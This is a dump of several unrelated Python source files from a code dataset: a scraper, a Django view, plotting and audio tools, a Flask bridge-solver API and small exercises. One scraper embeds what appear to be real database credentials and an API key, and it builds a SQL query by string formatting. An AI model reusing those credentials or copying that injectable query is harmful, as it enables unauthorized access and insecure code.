weapon_upgrade_img = pygame.transform.scale(weapon_upgrade_img, (35, 35))\n        self.image = weapon_upgrade_img.convert_alpha()\n        self.rect = self.image.get_rect()\n        self.radius = int(self.rect.width / 2)\n        self.rect.center = center\n","sub_path":"src/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"249549773","text":"# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport os\nimport time\nimport datetime\nimport pymysql\nimport urllib.request\nimport random\nimport string\nimport re\nfrom bs4 import BeautifulSoup\ndb = pymysql.connect(host= \"rm-bp1d3nze222r06y54.mysql.rds.aliyuncs.com\",port=3306,user=\"newsflow\",passwd=\"3MvO9da9Wn\",db=\"newsflow\", charset=\"utf8\")\n#db = pymysql.connect(host= \"192.168.1.168\",port=3306,user=\"admin\",passwd=\"123\",db=\"newsflow\", charset=\"utf8\")\ncur = db.cursor()\nurl=\"https://yiyouliao.com/rss/common/b40dcc399c8d/list/json?num=50\"\nheaders = {'Appkey':'341f2784dc0a4253be6bba666248ac8e','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'}\ndata = requests.get(url, headers=headers)\ndata.encoding='utf-8'\ntoday = time.strftime('%Y%m%d', time.localtime(time.time()))\nj=json.loads(data.text)\nnews_list=j['data']\n#address='C:/Users/Administrator/Desktop/demo/'\naddress='/mountimgserver/newsflow/'\nif not os.path.isdir(address+today):\n    os.mkdir(address+today)\nimgPath = today + \"/\"\ndef switch(cate):\n    if cate == '娱乐':\n        return 3\n    elif cate == '社会':\n        return 1\n    elif cate == '美食':\n        return 17\n    elif cate == '要闻':\n        return 32\n    elif cate == '健康':\n        return 33\n    elif cate == '搞笑':\n        return 13\n    elif cate == '奇趣':\n        return 13\n    else:\n        return 1\nfor x in news_list:\n    cate=x['category'][0:2]\n    title = x['title']\n    testUrl = 'https://www.ttdailynews.com/doc/check_title.htm?title='+title\n    response = requests.get(testUrl)\n    text = json.loads(response.text)\n    print(text)\n    if(text['ret']==False):\n        sql_cmd = '''select * from t_news_info where title = '%s' ''' % title\n        cur.execute(sql_cmd)\n        res = cur.fetchall()\n        suc = True\n        if (len(res) == 0):\n            try:\n                author=x['source']\n                url = x['link']\n                now = str(round(time.time() * 1000))\n                uid = \"youliao\" + now\n                info_type = \"1\"\n                pic1 = \"\"\n                pic2 = \"\"\n                pic3 = \"\"\n                if (len(x['covers']) == 1):\n                    info_type = \"2\"\n                elif(len(x['covers']) == 3):\n                    info_type = \"3\"\n                if (len(x['covers'])>0):\n                    i=1\n                    for a in x['covers']:\n                        imgName = ''.join(random.sample(string.ascii_letters + string.digits, 32))\n                        imgurl = a\n                        bytes = urllib.request.urlopen(imgurl)\n                        size = bytes.headers['content-length']\n                        size = int(size)\n                        size = round(size / 1024)\n                        size2 = str(size)\n                        if (size < 300):\n                            pic =address + imgPath + imgName + \".jpg\"\n                            if(i==1):\n                                pic1 = imgPath + imgName + \".jpg\"\n                            elif i ==2:\n                                pic2 = imgPath + imgName + \".jpg\"\n                            elif i == 3:\n                                pic3 = imgPath + imgName + \".jpg\"\n                            f = open(pic, 'wb');\n                            f.write(bytes.read());\n                            f.flush();  # flush buffered data to the file immediately\n                            f.close();  # close the file\n                            i=i+1\n                        else:\n                            print(\"image too large\")\n                            break\n                save_type = '1'\n                source = \"35\"\n                available_time = '30'\n                level = '0'\n                count = '0'\n                status = '1'\n                tag = '0'\n                new_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n                publish_t = time.time()\n                publish_r = random.randint(1, 1800)\n                publish_n = int(publish_t) + publish_r\n                time_local = time.localtime(publish_n)\n                dt = time.strftime(\"%Y-%m-%d %H:%M:%S\", time_local)\n                publish_time = str(dt)\n                create_time = str(new_time)\n                update_time = str(new_time)\n                news_time = str(new_time)\n                category = switch(cate)\n                is_prepare = '0'\n                is_rec = '0'\n                expire_time = str((datetime.datetime.now() + datetime.timedelta(days=5)).strftime(\"%Y-%m-%d %H:%M:%S\"))\n                insert_data = (\n                    \"INSERT INTO t_news_info(uid,category,title,save_type,info_type,source,author,url,pic1,pic2,pic3,news_time,expire_time,available_time,level,count,status,tag,publish_time,create_time,update_time,is_prepare,is_rec)\" \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\")\n                data_list = (uid, category, title, save_type, info_type, source, author, url, pic1, pic2, pic3, news_time, expire_time,available_time, level, count, status, tag, publish_time, create_time, update_time, is_prepare, is_rec)\n                # article body\n                content_data = requests.get(url, headers=headers)\n                content_data.encoding = 'utf-8'\n                soup = BeautifulSoup(content_data.text,'html.parser')\n                script_node = soup.find_all('script')[0]\n                text =str(script_node)\n                text = text.split('{', 1)[1:][0]\n                text = '{' + text\n                # text = re.sub('\\s+', '', 
text).strip()\n                text = text.replace('content', '\"content\"', 1)\n                text = text.replace('related:', '\"related\":', 1)\n                text = text[0:text.rfind('}', 1)+1]\n                j = json.loads(text)\n                content = j['content']\n                text = content['data']['content']\n                content = text.replace('imgsrc', 'img src')\n                content = content.replace('imgdata', 'img data')\n                if (content != \"None\"):\n                    insert_content = (\n                        \"INSERT INTO t_news_content(news_id,content,status,create_time,update_time)\" \"VALUES(%s,%s,%s,%s,%s)\")\n                    cur.execute(insert_data, data_list)\n                    data_content = (cur.lastrowid, content, status, create_time, update_time)\n                    cur.execute(insert_content, data_content)\n                    db.commit()\n                    print(\"add \" + title)\n            except Exception as ex:\n                print(\"error\", ex)\n        else:\n            print(\"exist \" + title)\n    else:\n        print(\"contains sensitive words\")","sub_path":"youliaoCatch.py","file_name":"youliaoCatch.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"20344037","text":"from .forms import DocumentForm\nfrom django.shortcuts import redirect, render\n\ndef model_form_upload(request):\n    if request.method == 'POST':\n        form = DocumentForm(request.POST, request.FILES)\n        # print(form.cleaned_data['name'])\n        if form.is_valid():\n            sub_name = form.cleaned_data['name']\n            file_name = request.FILES['document'].name\n            form.save()\n            return render(request, 'successful.html',{'name': sub_name, 'filename': file_name})\n    else:\n        form = DocumentForm()\n    return render(request, 'assignment_form.html', {'form': form})","sub_path":"summer_camp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"463480414","text":"import argparse\nimport pandas as pd\nimport pickle\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nimport seaborn as sns\nimport os\nimport json\nimport numpy as np\nfrom glob import glob\nfrom shutil import copyfile\n\nfrom torchme.parse_html import parse_begin, parse_end, parse_caption, parse_img, \\\n    parse_text, parse_img_grid, parse_header, parse_list\n\nparser = argparse.ArgumentParser(description='Generate html summary')\nparser.add_argument(\"--config\", type=str, default=\"examples/config.json\", help=\"Path to the config file\")\nparser.add_argument(\"--out\", type=str, default=\"examples/simple\", help=\"Path to the directory with summary files\")\nargs = vars(parser.parse_args())\n\n\ndef _read_logs(files, tasks):\n    df_files = pd.DataFrame(columns=tasks + ['file'])\n\n    for fn in files:\n        data = pickle.load(open(fn, 'rb'))\n\n        tasks_all = data['tasks']\n\n        if not all([task in tasks_all for task in tasks]):\n            continue\n\n        df = pd.concat([\n            pd.Series(data['results'][tasks_all.index(task_name)])\n            for task_name in tasks], axis=1)\n        df.columns = tasks\n        df['file'] = fn[fn.rfind('/') + 1:]\n\n        df_files = pd.concat([df_files, df])\n\n    return df_files\n\n\ndef plot_lineplot(params, df, colors):\n    x_name = params['x']\n    y_name = params['y']\n    figsize = params['figsize']\n    dpi = params['dpi']\n    n_files = len(np.unique(df['file']))\n\n    plt.gca().xaxis.grid(True)\n    sns.set_style('white')\n    sns.set_palette(colors[:n_files])\n\n    plt.close()\n    figure(num=0, figsize=figsize, dpi=dpi, facecolor='w', edgecolor='k')\n    df[y_name] = pd.to_numeric(df[y_name])\n    sns.lineplot(data=df, x=x_name, y=y_name, hue='file', legend='full', palette=sns.color_palette())\n\n\ndef _make_plot_img(params, files, colors, out):\n    x_name = params['x']\n    y_name = 
params['y']\n    tasks = [x_name, y_name]\n    df = _read_logs(files=files, tasks=tasks)\n    plot_lineplot(params, df, colors=colors)\n    plt.savefig(out)\n\n\ndef generate_html(config, out):\n    \"\"\"\n    Build directory with all the files and .html summary report.\n\n    Args:\n        config (str): path to the configuration\n        out (str): filepath to the directory\n    \"\"\"\n    config = json.load(open(config))\n\n    # Copy files to the report folder\n    if not os.path.exists(out):\n        os.makedirs(out)\n    copyfile(\"data/styles.css\", f\"{out}/styles.css\")\n    copyfile(\"data/logo.png\", f\"{out}/logo.png\")\n\n    # Copy all the images\n    img_files = glob(f\"{config['source_dir']}/*.gif\") + glob(f\"{config['source_dir']}/*.png\")\n    for img_fn in img_files:\n        fn = os.path.basename(img_fn)\n        print(\"base name: \", fn)\n        copyfile(img_fn, f\"{out}/{fn}\")\n\n    files = glob(f\"{config['source_dir']}/*.pkl\")\n    colors = [config['colors'][k] for k in config['colors']]\n    plots_grid = []\n    with open(os.path.join(out, 'index.html'), 'w') as f:\n        f.writelines(parse_begin())\n\n        for i, item in enumerate(config['content']):\n            print(\"Processing \", item)\n            if item['type'] == 'head':\n                f.writelines(parse_header(item))\n            elif item['type'] == 'text':\n                f.writelines(parse_text(item))\n            elif item['type'] == 'list':\n                f.writelines(parse_list(item))\n            elif item['type'] == 'caption':\n                f.writelines(parse_caption(item))\n            elif item['type'] in ['lineplot', 'img']:\n                if item['type'] == 'lineplot':\n                    _make_plot_img(item, files, colors, f\"{out}/plot_{i}.png\")\n                    item['path'] = f\"plot_{i}.png\"\n\n                if item['align'] == 'single':\n                    f.writelines(parse_img(item))\n                if item['align'] == 'group':\n                    plots_grid.append(item['path'])\n\n            item_is_last = i == len(config['content']) - 1\n            next_is_differ, next_is_single = False, False\n            if not item_is_last:\n                next_is_differ = config['content'][i+1]['type'] not in ['lineplot', 'img']\n                next_is_single = config['content'][i+1]['type'] in ['lineplot', 'img'] \\\n                    and config['content'][i+1]['align'] == 'single'\n            if item_is_last or next_is_single or next_is_differ:\n                f.writelines(parse_img_grid(plots_grid))\n                plots_grid = []\n\n        f.writelines(parse_end())\n\n    print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n    generate_html(**args)","sub_path":"torchme/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"471091297","text":"#Name: Yash Raja\n#Date: October 16th, 2017\n#File Name: Unit3_Day2_2_a.py\n#Description: Reads five marks and computes the average\n#Test Cases: 2 and 2.5 and 3.6\n\nmarkTotal = 0\nfor i in range (5):\n    mark = float(input(\"Enter the mark in percentage: \"))\n    markTotal = markTotal + mark\n\nmarkTotal = (markTotal / 5)\nprint(\"The average of the marks is \", markTotal,\"%\", sep=\"\")\n","sub_path":"Unit 3 - Repetions/1_2/Unit3Day2_2_a.py","file_name":"Unit3Day2_2_a.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"327927854","text":"# -*- coding: utf-8 -*-\n\"\"\"\ncsv-reader\n@author: Aramayis\n\"\"\"\n\nimport csv\n\ndef num_datapoints(filename):\n    \"\"\" Reads csv file and returns number of lines in file, where each line\n    represents data for a different timestamp.\n    \n    Keyword arguments:\n    filename -- file path for the data e.g. 
Data/apple_stocks.csv\n \n \"\"\"\n num = 0\n with open(filename, newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\n for row in csvreader:\n num += 1\n return num - 1 \n","sub_path":"csv-reader.py","file_name":"csv-reader.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"165362827","text":"\"\"\"\n*************************************************************************\n* Copyright 2020 Adobe. All rights reserved.\n* This file is licensed to you under the Apache License, Version 2.0 (the \"License\");\n* you may not use this file except in compliance with the License. You may obtain a copy\n* of the License at http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing, software distributed under\n* the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS\n* OF ANY KIND, either express or implied. See the License for the specific language\n* governing permissions and limitations under the License.\n**************************************************************************/\n\"\"\"\n\nimport logging\nfrom util import constants\n\nlogging.basicConfig(filename=constants.LOG_FILE,\n level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filemode='w')\n\nlogger = logging.getLogger()","sub_path":"util/setup_logger_utility.py","file_name":"setup_logger_utility.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"225182539","text":"# -*- coding: utf-8 -*-\n\"\"\"This module supplies everything related to instruments.\"\"\"\n\nimport logging\nimport pyo\nfrom configuration import audioInputs, audioServer, commandLine\nfrom osc import OscNode\nfrom tracks import Track, LooperTrack, ParticleTrack\n\nclass Instrument(OscNode, pyo.PyoObject):\n \"\"\"\n An Instrument is a double track container that holds a pyo.Looper and a pyo.Particle\n\n Each instance should be controllable through a double Behringer BCF2000 track\n \"\"\"\n\n def __init__(self, name, instrumentInput=audioInputs[0], autoNormalize=True):\n \"\"\"\n Instrument constructor\n\n Params:\n name : str\n Instrument name that also defines its OSC nodeName.\n\n instrumentInput : pyo.Input\n The qualified pyo.Input input, or the '0 signaled' global Input as default.\n\n Doctest:\n >>> i = Instrument('testInstrument')\n >>> i.in_fader is not None\n True\n >>> i.nodeName == 'testInstrument'\n True\n >>> i = Instrument('testInstrument')\n >>> i.nodeName == 'somethingWrong'\n False\n >>> del i\n \"\"\"\n logging.debug(\"Creating instrument node named '%s'\" % (name))\n OscNode.__init__(self, name)\n pyo.PyoObject.__init__(self)\n\n self.duration = commandLine.length\n self.in_fader = pyo.InputFader(instrumentInput)\n self.liveBuffer = pyo.NewTable(length=self.duration, chnls=1, feedback=0)\n self.recorderCursor = pyo.Phasor(freq=1.0/self.duration)\n self.recorder = pyo.TableWrite(input=self.in_fader,\n pos=self.recorderCursor,\n table=self.liveBuffer)\n self.fixedBuffer = pyo.NewTable(length=self.liveBuffer.getLength())\n self.setAutoNormalize(autoNormalize)\n\n self.addChild(LooperTrack(\"looperTrack\", self.fixedBuffer, self))\n self.addChild(ParticleTrack(\"particleTrack\", self.fixedBuffer, self))\n\n self.out_fader = self.children[\"looperTrack\"].getOut() + 
self.children[\"particleTrack\"].getOut()\n self._base_objs = self.out_fader.getBaseObjects()\n logging.debug(\"New instrument named '%s' created with auto normalization '%s'\" % (name, \"on\" if self.autoNormalize else \"off\"))\n\n\n def __del__(self):\n \"\"\"Destructor called when still no reference to object\n\n See: https://docs.python.org/2/reference/datamodel.html#object.__del__\n \"\"\"\n logging.warning(\"'%s' Instrument is dying!\" % (self.nodeName))\n\n\n def view(self):\n \"\"\"Show something relevant to current instrument, particularly its wavetable\"\"\"\n self.fixedBuffer.view(title=\"fixedBuffer of '\" + str(self.nodeName) + \"'\")\n\n\n def refreshFixedBuffer(self):\n \"\"\"\n Update the fixedBuffer buffer with the last live recorded table liveBuffer\n\n Return:\n True while everything's good\n False otherwise\n\n Doctest:\n >>> i = Instrument('testInstrument')\n >>> i.in_fader is not None\n True\n >>> i.nodeName == 'testInstrument'\n True\n \"\"\"\n logging.debug(\"Snapshot the '%s' live buffer\" % (self.nodeName))\n startPos = int(self.recorderCursor.get() * self.duration * audioServer.getSamplingRate())\n tmpTable = self.liveBuffer.getTable()\n newBuffer = tmpTable[startPos:len(tmpTable)] + tmpTable[0:startPos]\n self.fixedBuffer.replace(newBuffer)\n if self.autoNormalize:\n self.fixedBuffer.normalize()\n\n\n def snapShot(self):\n \"\"\"Wrapper to refreshFixedBuffer\"\"\"\n self.refreshFixedBuffer()\n\n\n def setAutoNormalize(self, value=True):\n \"\"\"Define the auto normalization flag\n\n Params:\n value : bool\n Th flag vaue. Default to True.\n \"\"\"\n self.autoNormalize = True if value is None else value\n\n\n def setInput(self, newInput, fadetime=0.05):\n \"\"\"\n Set the Instrument input to another one\n\n Params:\n newInput : pyo.PyoObject or int\n New input to use for live recording.\n If int, corresponding jack audio input wil be used\n\n fadetime : float\n Crossfade time between old and new input. Defaults to 0.05.\n \"\"\"\n logging.debug(\"Set '%s' audio input signal to '%s'\" % (self.nodeName, newInput))\n if isinstance(newInput, int) and newInput in range(len(audioInputs)):\n self.in_fader.setInput(audioInputs[newInput], float(fadetime))\n elif isinstance(newInput, pyo.PyoObject) or hasattr(newInput, \"stream\"):\n self.in_fader.setInput(newInput, float(fadetime))\n\n\n def play(self, dur=0, delay=0):\n \"\"\"Start processing without sending samples to output. This method is called automatically at the object creation.\n\n This method returns self, allowing it to be applied at the object creation.\n\n Params:\n dur : float\n Duration, in seconds, of the object’s activation. The default is 0 and means infinite duration.\n\n delay : float\n Delay, in seconds, before the object’s activation. Defaults to 0.\n \"\"\"\n self.out_fader.play(dur, delay)\n return pyo.PyoObject.play(self, dur, delay)\n\n\n def stop(self):\n \"\"\"Stop processing.\n\n This method returns self, allowing it to be applied at the object creation.\n \"\"\"\n self.out_fader.stop()\n return pyo.PyoObject.stop(self)\n\n\n def out(self, chnl=0, inc=1, dur=0, delay=0):\n \"\"\"Start processing and send samples to audio output beginning at chnl.\n\n This method returns self, allowing it to be applied at the object creation.\n\n Params:\n chnl : int\n Physical output assigned to the first audio stream of the object. Defaults to 0.\n\n inc : int\n Output channel increment value. Defaults to 1.\n\n dur : float\n Duration, in seconds, of the object’s activation. 
The default is 0 and means infinite duration.\n\n delay : float\n Delay, in seconds, before the object’s activation. Defaults to 0.\n \"\"\"\n logging.info(\"Instrument '%s' sends its signal to output #%s\" % (self.nodeName, chnl))\n self.out_fader.play(dur, delay)\n return pyo.PyoObject.out(self, chnl, inc, dur, delay)\n\n\n def togglePlay(self,play):\n \"\"\"\n Toggle Instrument's state between [playing] and [stopped]\n \"\"\"\n if play:\n self.play()\n else:\n self.stop()\n\n\nclass InstrumentManager(OscNode):\n \"\"\"This is the Instrument manager\"\"\"\n\n def __init__(self, name):\n \"\"\"\n InstrumentManager constructor\n\n Params:\n name : str\n Instrument name that also defines its OSC nodeName.\n\n Doctest:\n >>> m = InstrumentManager('testManager')\n >>> 'testManager' == m.nodeName\n True\n >>> del m\n \"\"\"\n OscNode.__init__(self, str(name))\n\n\n def __del__(self):\n \"\"\"InstrumentManager destructor\"\"\"\n logging.info(\"Removing instrument manager '%s' and all its content\" % (self.nodeName))\n while len(self.children) > 0:\n # next(iter(...)) grabs an arbitrary child name (dict views are not indexable in py3)\n self.removeInstrument(next(iter(self.children)))\n\n\n def __getitem__(self, name):\n \"\"\"Operator [] to access managed instruments\n\n Doctest:\n >>> m = InstrumentManager('testManager')\n >>> m.addInstrument('instrumentTest', pyo.Sig(0))\n >>> m['instrumentTest'].nodeName == m.children['instrumentTest'].nodeName\n True\n >>> del m\n \"\"\"\n return self.children[name]\n\n\n def view(self):\n \"\"\"Show each registered instrument\"\"\"\n for instrument in self.children:\n self.children[instrument].view()\n\n\n def setStandardInstruments(self):\n \"\"\"Initialize the manager with an Instrument for each input channel\"\"\"\n for i in range(1, len(audioInputs)):\n self.addInstrument(str(i), audioInputs[i])\n\n\n def addInstrument(self, name, input):\n \"\"\"\n Add a new instrument against its name, replacing existing one\n\n Params:\n name : str\n Instrument name to be added to the manager\n\n input : pyo.PyoObject\n Input signal to link to the new Instrument\n\n Doctest:\n >>> m = InstrumentManager('testManager')\n >>> m.addInstrument('instrumentTest', pyo.Sig(0))\n >>> m.children['instrumentTest'].nodeName == 'instrumentTest'\n True\n >>> del m\n \"\"\"\n self.addChild(Instrument(name, input))\n\n\n def removeInstrument(self, instrumentName):\n \"\"\"\n Remove an Instrument by its nodeName\n\n Params:\n instrumentName : str\n Instrument nodeName that identifies the removable Instrument\n\n Doctest:\n >>> m = InstrumentManager('testManager')\n >>> m.addInstrument('instrumentTest', pyo.Sig(0))\n >>> m.removeInstrument('instrumentTest')\n >>> 'instrumentTest' in m.children\n False\n >>> del m\n \"\"\"\n self.removeChild(instrumentName)\n\n\n def out(self):\n \"\"\"Activate all Instruments outputs\"\"\"\n logging.debug(\"Connect each Instrument to its numbered output\")\n for child in self.children:\n self.children[child].out(chnl=int(child) - 1)\n\n\nif __name__ == \"__main__\":\n import doctest\n fails,total = doctest.testmod(verbose=True)\n if total > 0 and fails == 0:\n manager = InstrumentManager(\"iMgr\")\n manager.setStandardInstruments()\n i = manager.children[\"1\"]\n patLive = pyo.Pattern(i.liveBuffer.refreshView, 0.05).play()\n patFixed = pyo.Pattern(i.fixedBuffer.refreshView, 0.05).play()\n i.liveBuffer.view()\n i.fixedBuffer.view()\n audioServer.start()\n 
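# illustrative follow-up calls (hypothetical; assume audioInputs has an entry at index 2):\n # i.setInput(2, fadetime=0.1) # crossfade the live input over 100 ms\n # i.snapShot() # freeze the current live buffer into fixedBuffer\n 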
audioServer.gui(locals())\n","sub_path":"instruments.py","file_name":"instruments.py","file_ext":"py","file_size_in_byte":9788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"441525852","text":"from flask import Flask, request\nfrom flask_cors import CORS\nfrom flask_restful import Resource, Api\n\nfrom .dds import DDS\n\nimport yaml\n\n# Configuration filename\nconfig_filename = \"server.yaml\"\n\n# Default for maximum threads is to let the library decide\nmt = 0\n# Default for maximum memory is to let the library decide\nmm = 0\n\napp = Flask(__name__)\n\nconfig = {}\ntry:\n with open(config_filename) as config_handle:\n config = yaml.safe_load(config_handle)\n libdds_config = config.get('libdds', {})\n mm = libdds_config.get('max_memory', mm)\n mt = libdds_config.get('max_threads', mt)\nexcept (yaml.YAMLError, AttributeError) as err:\n app.logger.critical(f\"Unable to parse configuration {config_filename}: \"\n f\"{err}\")\n raise\nexcept Exception as err:\n app.logger.warning(f\"Unable to load configuration {config_filename}: \"\n f\"{err}\")\n app.logger.warning(\"Using the default configuration.\")\n\napp.config.from_mapping(config.get('flask', {}))\nCORS(app)\napi = Api(app)\n\n# When SetMaxThreads is called there must not be any other threads calling\n# libdds. The easiest way to avoid parallel calls is to keep only one DDS\n# object as long as server runs.\ndds = DDS(max_threads=mt, max_memory=mm)\n\n\nclass DDSTable(Resource):\n def get(self):\n return {'hello': 'world'}\n\n def post(self):\n \"\"\"Takes in a single hand and returns a DDS table\"\"\"\n data = request.get_json()\n # Verify the data here\n # self.verifyinput(data)\n dds_table = dds.calc_dd_table(data['hands'])\n return dds_table\n\n\nclass DDSScore(Resource):\n def post(self):\n \"\"\"This should hook in to the dds_scores function listed below\"\"\"\n raise NotImplementedError()\n\n def dds_scores(self, dds, state, target, solutions, mode=1):\n \"\"\"Gives the dds score for the given contract, may be mid-hand\"\"\"\n n = len(state['plays']) % 4\n first = state['plays'][-n][0] if n > 0 else state['turn']\n trick = [c for _, c in state['plays'][-n:]] if n > 0 else []\n return dds.solve_board(state['trump'], first, trick, state['hands'],\n target, solutions, mode)\n\n\napi.add_resource(DDSTable, '/api/dds-table/')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n # Here is an example command to use with curl\n # curl --header \"Content-Type: application/json\" --request POST --data '{\"hands\":{\"S\":[\"D3\", \"C6\", \"DT\", \"D8\", \"DJ\", \"D6\", \"CA\", \"C3\", \"S2\", \"C2\", \"C4\", \"S9\", \"S7\"],\"W\":[\"DA\", \"S4\", \"HT\", \"C5\", \"D4\", \"D7\", \"S6\", \"S3\", \"DK\", \"CT\", \"D2\", \"SK\",\"H8\"],\"N\":[\"C7\", \"H6\", \"H7\", \"H9\", \"CJ\", \"SA\", \"S8\", \"SQ\", \"D5\", \"S5\", \"HK\", \"C8\", \"HA\"],\"E\":[\"H2\", \"H5\", \"CQ\", \"D9\", \"H4\", \"ST\", \"HQ\", \"SJ\", \"HJ\", \"DQ\", \"H3\", \"C9\", \"CK\"]}}' http://localhost:5000/api/dds-table/\n\n # Example input format\n # state = {\n # 'plays': [['W', 'H8']],\n # 'hands': {\n # 'S': ['D3', 'C6', 'DT', 'D8', 'DJ', 'D6', 'CA', 'C3', 'S2', 'C2', 'C4', 'S9', 'S7'],\n # 'W': ['DA', 'S4', 'HT', 'C5', 'D4', 'D7', 'S6', 'S3', 'DK', 'CT', 'D2', 'SK'],\n # 'N': ['C7', 'H6', 'H7', 'H9', 'CJ', 'SA', 'S8', 'SQ', 'D5', 'S5', 'HK', 'C8', 'HA'],\n # 'E': ['H2', 'H5', 'CQ', 'D9', 'H4', 'ST', 'HQ', 'SJ', 'HJ', 'DQ', 'H3', 'C9', 'CK']\n # },\n # 'trump': 'N'\n # }\n # Solve for a specific 
position inside the play\n # print(dds_scores(dds, state, target=-1, solutions=3))\n\n # Generate the table at the end of the board\n # state['hands']['W'].append('H8')\n # print(dds.calc_dd_table(state['hands']))\n\n","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"17671070","text":"# define all possible characters used when generating messages\nlettersSet = \" abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!.\"\ntarget = \"intelligent information systems.\"\n\nimport random\n\n# generate the initial population\ndef generateParent(length: int) -> str:\n genesList = list()\n while len(genesList) < length:\n sampleSize = min(length - len(genesList), len(lettersSet))\n genesList.extend(random.sample(lettersSet, sampleSize))\n return \"\".join(genesList)\n\n\n# compute the fitness function\ndef fitness(guess) -> int:\n return sum(1 for expected, actual in zip(target, guess) if expected == actual)\n\n\n# mutate new individuals\ndef mutate(parent):\n index = random.randrange(0, len(parent))\n childGenes = list(parent)\n newGene, alternate = random.sample(lettersSet, 2)\n if newGene == childGenes[index]:\n childGenes[index] = alternate\n else:\n childGenes[index] = newGene\n return \"\".join(childGenes)\n\n\nimport datetime\n\n# print the results\ndef display(guess):\n timeDiff = datetime.datetime.now() - startTime\n res = fitness(guess)\n print(\"{0}\\t{1}\\t{2}\".format(guess, res, str(timeDiff)))\n\n\nrandom.seed()\nstartTime = datetime.datetime.now()\nbestParent = generateParent(len(target))\nbestFitness = fitness(bestParent)\ndisplay(bestParent)\n\n# iterate until the correct solution is found\n\nwhile True:\n child = mutate(bestParent)\n childFitness = fitness(child)\n\n if childFitness <= bestFitness:\n continue\n display(child)\n if len(bestParent) <= childFitness:\n break\n bestFitness = childFitness\n bestParent = child\n","sub_path":"Tasks/lab1_3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"147565767","text":"# ---------------------------------------\n# tiled maze solution finder\n# ---------------------------------------\n# add tiles to \"allTilesEdges\"\n# each tile comprises 16 possible exits, 1 = exit, 0 = wall\n# list each tile's exits working clockwise from a starting point\n# \"allTiles\" tuples list each tile in each of its 4 possible rotations\n# where tuple = (tileIndex in allTileEdges, rotation clockwise * 90 degrees)\n# visual of the 'best' solution:\n# 0 0 0 1 0 1 1 0 0 0 0 0 0 0 0 1\n# 0 1 1 1 1\n# 0 0 0 0 0\n# 0 0 0 1 0\n# 0 1 1 1 0\n# 1 0 0 1 0 0 0 0 0 1 1 0 0 0 0 1\n# 1 0 0 1 0\n# 1 0 0 0 0\n# 0 0 0 1 0\n# 1 1 1 1 1\n# 1 0 0 1 0 0 1 0 0 1 1 0 0 0 0 0\n# 1 1 0 0 0\n# 0 1 1 1 0\n# 0 0 1 0 1\n# 1 1 0 0 0\n# 0 1 1 0 0 1 1 0 0 0 0 1 0 1 0 0\n# 1 0 1 0 0\n# 1 1 0 0 0\n# 0 0 1 1 0\n# 1 0 1 0 0\n# 1 0 1 1 1 0 0 1 0 0 0 1 1 0 0 1\n\n\n\nallTiles = [(0,0),(0,1),(0,2),(0,3),(1,0),(1,1),(1,2),(1,3),(2,0),(2,1),(2,2),(2,3),(3,0),(3,1),(3,2),(3,3),(4,0),(4,1),(4,2),(4,3),(5,0),(5,1),(5,2),(5,3),(6,0),(6,1),(6,2),(6,3),(7,0),(7,1),(7,2),(7,3),(8,0),(8,1),(8,2),(8,3),(9,0),(9,1),(9,2),(9,3),(10,0),(10,1),(10,2),(10,3),(11,0),(11,1),(11,2),(11,3),(12,0),(12,1),(12,2),(12,3),(13,0),(13,1),(13,2),(13,3),(14,0),(14,1),(14,2),(14,3),(15,0),(15,1),(15,2),(15,3)]\n\nallTilesEdges = 
